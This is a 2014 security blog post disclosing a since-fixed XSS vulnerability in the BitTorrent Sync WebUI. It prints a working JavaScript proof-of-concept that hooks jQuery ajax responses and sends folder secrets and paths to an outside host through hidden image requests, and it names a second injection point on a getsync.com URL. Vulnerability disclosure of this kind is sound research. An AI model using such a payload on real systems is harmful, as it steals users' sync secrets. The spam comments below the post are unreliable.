Monday, December 29, 2014

BitTorrent Sync WebUI XSS vulnerability

BitTorrent Sync WebUI (<= 1.4.92) is affected by XSS vulnerability that could be exploitable in some rare scenarios.

Proof of concept video (stealing secrets):

PoC exploit uses jQuery global ajax hook (jQuery library is already used in WebUI) to fetch necessary data (secrets in our case) directly from internal ajax responses instead of DOM parsing.

Sample payload:
fakeImgUrl = 'http://cinu.pl/research/btsync/webui-xss/image/';
folders = [];

// ajax hook - all data is there
$(document).ajaxComplete(function(event, xhr, settings) {
 try {
  json=$.parseJSON(xhr.responseText);

  for(var i in json.folders) {
   var str=encodeURIComponent(json.folders[i].secret+':'+json.folders[i].path+':'+json.folders[i].status);

   if (folders.indexOf(str)==-1) {
    folders.push(str);
    $('body').append('<img style=\'display:none\' src=\''+fakeImgUrl+'?'+str+'\'>');
    console.log('SEND ' + str);
   }
  }
 } catch (e) {
  // error
  return;
 }
});

I've found also minor XSS on https://link.getsync.com/#f=XSS_HERE

Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD

12 comments:

  1. When someone writes an article he/she keeps the idea of a user in his/her brain that how a user can understand it.
    Thus that’s why this paragraph is amazing. Thanks!

    ReplyDelete
  2. Can you suggest a good hosting provider at a honest price?
    Kudos, I appreciate it!

    ReplyDelete
  3. I’m gone to inform my little brother, that he
    should also pay a quick visit this website on regular basis to obtain updated from latest news.

    ReplyDelete
  4. I’ve read a few just right stuff here. Definitely
    worth bookmarking for revisiting. I wonder how a lot effort you place to make such a excellent informative
    website.

    ReplyDelete
  5. My partner and I absolutely love your blog and find many of your post’s
    to be just what I’m looking for. Do you offer
    guest writers to write content in your case? I wouldn’t mind composing a post or elaborating on most of the subjects you write regarding here.
    Again, awesome blog!

    ReplyDelete
  6. Hi, I do think this is an excellent blog. I stumbledupon it �� I may
    return yet again since I book marked it. Money
    and freedom is the greatest way to change, may you be rich and continue to help others.

    ReplyDelete
  7. You ought to be a part of a contest for one of the best websites on the internet.
    I’m going to highly recommend this web site!

    ReplyDelete
  8. I really like what you guys are up too. Such clever work and reporting!
    Keep up the very good works guys I’ve added you guys to my blogroll.

    ReplyDelete
  9. First off I want to say fantastic blog! I had a quick question in which
    I’d like to ask if you don’t mind. I was curious to know how you
    center yourself and clear your head before writing.

    I have had a difficult time clearing my mind in getting
    my thoughts out there. I truly do enjoy writing however it just
    seems like the first 10 to 15 minutes are generally
    lost just trying to figure out how to begin. Any ideas or tips?

    Many thanks!

    ReplyDelete
  10. AP Inter 1st Year Model Paper 2021 Directorate of Andhra Pradesh Board of Intermediate Education (BIEAP) Government Examinations is an independent department functioning under ministry of secondary education for AP Intermediate Model Paper 2021 , Government of Andhra Pradesh. AP Intermediate Model Paper and Andhra Pradesh Inter Model Paper 2021 Students Download Manabadi AP Inter 1st Year and 2nd Year Model Paper 2021 at Official Website at AP Jr Inter Model Paper 2021 The department is responsible for conducting the Intermediate Public Examinations and a number of minor examinations and Students in Pdf Format for All Subject Sample Paper as given below

    ReplyDelete
  11. pg godslot168 เว็บไซต์ที่ให้บริการเกมสล็อตออนไลน์ที่จัดเต็มความเพลิดเพลินที่มาแรงที่สุดเป็นเว็บไซต์เกมที่มีผู้เล่นเข้ามาเล่นมากมาย PG SLOT มีเกมสล็อตมีชื่อเสียง

    ReplyDelete
  12. This comment has been removed by the author.

    ReplyDelete